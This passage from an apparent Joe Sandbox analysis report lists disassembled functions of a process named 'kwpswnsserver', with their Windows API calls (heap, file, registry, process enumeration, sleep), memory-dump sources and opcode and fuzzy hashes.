                                                                    • Part of subcall function 04288E5B: __mtinitlocknum.LIBCMT ref: 04288E71
                                                                    • Part of subcall function 04288E5B: __amsg_exit.LIBCMT ref: 04288E7D
                                                                    • Part of subcall function 04288E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,04283F06,0000000D,04296340,00000008,04283FFF,00000000,?,042810F0,00000000,04296278,00000008,04281155,?), ref: 04288E85
                                                                  • __tzset_nolock.LIBCMT ref: 0428642C
                                                                    • Part of subcall function 04285D22: __lock.LIBCMT ref: 04285D44
                                                                    • Part of subcall function 04285D22: ____lc_codepage_func.LIBCMT ref: 04285D8B
                                                                    • Part of subcall function 04285D22: __getenv_helper_nolock.LIBCMT ref: 04285DAD
                                                                    • Part of subcall function 04285D22: _free.LIBCMT ref: 04285DE4
                                                                    • Part of subcall function 04285D22: _strlen.LIBCMT ref: 04285DEB
                                                                    • Part of subcall function 04285D22: __malloc_crt.LIBCMT ref: 04285DF2
                                                                    • Part of subcall function 04285D22: _strlen.LIBCMT ref: 04285E08
                                                                    • Part of subcall function 04285D22: _strcpy_s.LIBCMT ref: 04285E16
                                                                    • Part of subcall function 04285D22: __invoke_watson.LIBCMT ref: 04285E2B
                                                                    • Part of subcall function 04285D22: _free.LIBCMT ref: 04285E3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1828324828-0
                                                                  • Opcode ID: 1605aab424bbb690b0a3b7ccff6761b58a7ccec011e3ce231b6b0c3a90a0a936
                                                                  • Instruction ID: fbf772429cbb27773036e322e9f899186e29b8b8e3504d62b5be304e95a28504
                                                                  • Opcode Fuzzy Hash: 1605aab424bbb690b0a3b7ccff6761b58a7ccec011e3ce231b6b0c3a90a0a936
                                                                  • Instruction Fuzzy Hash: BEE01231F63711D7EB367FE4B606A0CF2A0AB94F29F64821DE950214C0EA743951C652
                                                                  Function 04276EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCloseKey.ADVAPI32(80000001,04276E9A), ref: 04276EC9
                                                                  • RegCloseKey.ADVAPI32(75BF73E0), ref: 04276ED2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 3264d68bae967dd69a8002d5f4c9ec9332c1450fb4bc36337256042731cd91f7
                                                                  • Instruction ID: 59c94d18a7094f45f65da7b2f7d844eff3580607b31b106f309fe6ecd8c8cfe3
                                                                  • Opcode Fuzzy Hash: 3264d68bae967dd69a8002d5f4c9ec9332c1450fb4bc36337256042731cd91f7
                                                                  • Instruction Fuzzy Hash: 05C09B72D01038B7CF10E7A8FD4894D77B89F4C110F1144C2A104A3114C634BD41CF90
                                                                  Function 6C9E15D0 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,6C9E15BF,6C9E8E21,?,00000000,00000000), ref: 6C9E1626
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6C9E8E21), ref: 6C9E1630
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseErrorHandleLast
                                                                  • String ID:
                                                                  • API String ID: 918212764-0
                                                                  • Opcode ID: cfcfed1bd2941d9395b99e20c87c5376b98b40433b94a8e0690537aae0140706
                                                                  • Instruction ID: 698fcee1dee932fdf64dffd37d56580a4b42bd0239b0836a79aeef1038452db1
                                                                  • Opcode Fuzzy Hash: cfcfed1bd2941d9395b99e20c87c5376b98b40433b94a8e0690537aae0140706
                                                                  • Instruction Fuzzy Hash: 33114C33B096605AC3165375D804BAD276D8FBBB3CF2D4309E819ABAC2DF60D8819250
                                                                  Function 6C9D599D Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b5d5f1bfb22e89df1f1b8f4761d24c3bd062a4e1fcd55ea3cdc8e47b8c30595
                                                                  • Instruction ID: d52b155b73bb772ae2922d12d639abf546389133d87fe5916c7c80aa0ffc9f54
                                                                  • Opcode Fuzzy Hash: 4b5d5f1bfb22e89df1f1b8f4761d24c3bd062a4e1fcd55ea3cdc8e47b8c30595
                                                                  • Instruction Fuzzy Hash: 9F51A7B0A00658AFDB04CF98C884E997FB5EF55328F26C199E8587B751D371EE41CB90
                                                                  Function 6C89DF5B Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89DF62
                                                                    • Part of subcall function 6C89E2B7: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C89E314
                                                                    • Part of subcall function 6C89E2B7: VerSetConditionMask.KERNEL32(00000000), ref: 6C89E31C
                                                                    • Part of subcall function 6C89E2B7: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C89E32D
                                                                    • Part of subcall function 6C89E2B7: GetSystemMetrics.USER32(00001000), ref: 6C89E33E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
                                                                  • String ID:
                                                                  • API String ID: 2710481357-0
                                                                  • Opcode ID: 606daa51da63e9576eb0ae0e06df75a38b9c1efd3baf12cc4633ae1fedcd4ac9
                                                                  • Instruction ID: bbd9da7f0a7e809180bcd81285fa5e980984fcaf889d97253a65cf90035ab9cc
                                                                  • Opcode Fuzzy Hash: 606daa51da63e9576eb0ae0e06df75a38b9c1efd3baf12cc4633ae1fedcd4ac9
                                                                  • Instruction Fuzzy Hash: 1851CEB0905F458FD3A9CF3A85417C6FAE0BF89300F508A2E91AED6760EB716584CF55
                                                                  Function 6C9DFCE2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: __wsopen_s
                                                                  • String ID:
                                                                  • API String ID: 3347428461-0
                                                                  • Opcode ID: 89ddbff2cbf64cd56578aaf29d1c31d797980f73e29026636115abf8e4d941bd
                                                                  • Instruction ID: e9a1773b741edb3c7bfc6812117e7512177ffa808edb41232cd818cf233ee314
                                                                  • Opcode Fuzzy Hash: 89ddbff2cbf64cd56578aaf29d1c31d797980f73e29026636115abf8e4d941bd
                                                                  • Instruction Fuzzy Hash: 52118C71A0460AAFCB05DF98E94199B3BF8EF48308F05809AF804EB301D730E911CBA4
                                                                  Function 0428A6F2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0428454A,00000000,00000001,00000000,00000000,00000000,?,04283E0D,00000001,00000214,?,04284500), ref: 0428A735
                                                                    • Part of subcall function 0427F91B: __getptd_noexit.LIBCMT ref: 0427F91B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 328603210-0
                                                                  • Opcode ID: cf81d7ec2e06bbf822af5dedf52c3c3dcfbf53d447445d1fdd42a39fb296eec5
                                                                  • Instruction ID: aa8e45d2ed311de76991c28f2d969a39ab361d2ffa957bd456e3fef55148e997
                                                                  • Opcode Fuzzy Hash: cf81d7ec2e06bbf822af5dedf52c3c3dcfbf53d447445d1fdd42a39fb296eec5
                                                                  • Instruction Fuzzy Hash: 1B01B5353222169AEB24AE29DC44B6E37A4AB817A4F1545AEE815CB1D0DF78A801D750
                                                                  Function 6C9E06F2 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C9D9301: RtlAllocateHeap.NTDLL(00000000,6C9DD272,?,?,6C9DD272,00000220,?,00000016,?), ref: 6C9D9333
                                                                  • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,00000000,?,6C9D2A1B,00000000,?,?,?,?,?,6C9DF021,?,?), ref: 6C9E074F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 62e4ba6125a2a90d9812d90db437fdff0f0117c09960cabf494a40fef952a26e
                                                                  • Instruction ID: 71992f818442a7a14cd476e570b6c58166151c01a269f692305edb1b1e96bd39
                                                                  • Opcode Fuzzy Hash: 62e4ba6125a2a90d9812d90db437fdff0f0117c09960cabf494a40fef952a26e
                                                                  • Instruction Fuzzy Hash: D8F0FC3120259566DB131A679C40F8F3F6C9FBEFB8F115115E81C97AC0DF32D401A9A1
                                                                  Function 6C9D9301 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,6C9DD272,?,?,6C9DD272,00000220,?,00000016,?), ref: 6C9D9333
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 78c5404caa8f3880807ecfa7fd39d478de12e62c087ea8238525c3ddaad71ec8
                                                                  • Instruction ID: 84d87fb7c070c836c5918e2b9d3c9b09b5c7bcc02f59b4ec6f6a85156d389166
                                                                  • Opcode Fuzzy Hash: 78c5404caa8f3880807ecfa7fd39d478de12e62c087ea8238525c3ddaad71ec8
                                                                  • Instruction Fuzzy Hash: 39E06531341A26A7FB113AE99C24F96B65C9F626ACF5BC120DC18F7DD4EF50E80181A2
                                                                  Function 6C872040 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(?,?,?,?,6C873107), ref: 6C872055
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID:
                                                                  • API String ID: 4033686569-0
                                                                  • Opcode ID: 1a0e0c09bbeb4c9cac439ba35c40a2139beed166acd05222e9716cbe4e1f7aee
                                                                  • Instruction ID: f4cce42a03ea16e3d2b3e9ef8aa54e6735b1eb2c59c54a075025e48033399014
                                                                  • Opcode Fuzzy Hash: 1a0e0c09bbeb4c9cac439ba35c40a2139beed166acd05222e9716cbe4e1f7aee
                                                                  • Instruction Fuzzy Hash: A8F0FE75C08288EFCF11EBACC1493DCBFB49B15244F0484D5D88897342E2399685CB62
                                                                  Function 6C9E9033 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(6C86A690,00000000,?,6C9E8CD7,?,?,00000000,?,6C9E8CD7,6C86A690,0000000C), ref: 6C9E9050
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 877bf5e4d6b65f35c7c9d29e68546a07cead7f3fcaee984688d997a2e0811cbd
                                                                  • Instruction ID: b848deecb4105cd83adf3cb49c7948aa4ea2c7cb6361b45a275228de216e04cd
                                                                  • Opcode Fuzzy Hash: 877bf5e4d6b65f35c7c9d29e68546a07cead7f3fcaee984688d997a2e0811cbd
                                                                  • Instruction Fuzzy Hash: 6ED06C3210024DBBDF129E84DC06EDA3BAAFB48714F018100BE1896020C732E822AB90
                                                                  Function 6C88315A Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 6C883169
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteObject
                                                                  • String ID:
                                                                  • API String ID: 1531683806-0
                                                                  • Opcode ID: d99afeab155959af3b2eedc2ba0b1f8e2999dc56136c528369a1264107995be6
                                                                  • Instruction ID: ab882532a39b09d39a932062ee37e149b9b738ef98904a092f43513d807f818f
                                                                  • Opcode Fuzzy Hash: d99afeab155959af3b2eedc2ba0b1f8e2999dc56136c528369a1264107995be6
                                                                  • Instruction Fuzzy Hash: 7EB092B5912212AACE2066B48B087066AB45B42B0EF288DA4B006C2840EB79E4468540
                                                                  Function 6C879BA0 Relevance: 1.3, APIs: 1, Instructions: 67sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C879760: CreateToolhelp32Snapshot.KERNEL32 ref: 6C87978C
                                                                    • Part of subcall function 6C879760: Process32FirstW.KERNEL32 ref: 6C87980C
                                                                    • Part of subcall function 6C879760: WideCharToMultiByte.KERNEL32 ref: 6C87986F
                                                                    • Part of subcall function 6C879760: Process32NextW.KERNEL32 ref: 6C87990D
                                                                    • Part of subcall function 6C879760: CloseHandle.KERNEL32 ref: 6C87994B
                                                                  • Sleep.KERNEL32 ref: 6C879C7F
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$ByteCharCloseCreateFirstHandleMultiNextSleepSnapshotToolhelp32Wide
                                                                  • String ID:
                                                                  • API String ID: 2353013123-0
                                                                  • Opcode ID: 01dff80a930b3e360fca408c9bb0aac68015adb107cc5af2e89b3e290929ffb1
                                                                  • Instruction ID: e9f26f0f2cb82c745d45565d8812fd9e5a231c8caa0da959f2159d393c522f87
                                                                  • Opcode Fuzzy Hash: 01dff80a930b3e360fca408c9bb0aac68015adb107cc5af2e89b3e290929ffb1
                                                                  • Instruction Fuzzy Hash: 53213BB0E00359CFCB24DFACC9416DEBBB4BB05760F004A29D411AB780E775A949CBA2
                                                                  Function 6C8554A7 Relevance: 1.3, APIs: 1, Instructions: 65sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 3ec5af1ef48804f8bf2418fa6cb60a96480243bf9ef1e54474ec564ccbea4ba0
                                                                  • Instruction ID: 2914ef4157316a42a034601372473a1944682de51d50f72d6e5d6040bb2260bc
                                                                  • Opcode Fuzzy Hash: 3ec5af1ef48804f8bf2418fa6cb60a96480243bf9ef1e54474ec564ccbea4ba0
                                                                  • Instruction Fuzzy Hash: DD215BB5A54348CFCB64DFECD60159DBBB1BF86305F818829C4059BB14D7B49829CB92
                                                                  Function 6C879730 Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: e51cd8c2ca5dc8006a095227df8cbdcbf336913ca4f89663a06250d916917681
                                                                  • Instruction ID: 83e015ec8ae2f9d118281d2bebf6f4d22ebf145f2f39dde152b4745158166594
                                                                  • Opcode Fuzzy Hash: e51cd8c2ca5dc8006a095227df8cbdcbf336913ca4f89663a06250d916917681
                                                                  • Instruction Fuzzy Hash: 05D09EB5D002099FC740FFFCE94548DBFF4AB44210F008175E989D7300E6749695CB96

                                                                  Non-executed Functions

                                                                  Function 6C8B8664 Relevance: 21.3, APIs: 14, Instructions: 309windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetRectEmpty.USER32(?), ref: 6C8B86F9
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C8B8717
                                                                  • ReleaseCapture.USER32 ref: 6C8B871D
                                                                  • SetCapture.USER32(?), ref: 6C8B8730
                                                                  • ReleaseCapture.USER32 ref: 6C8B87BD
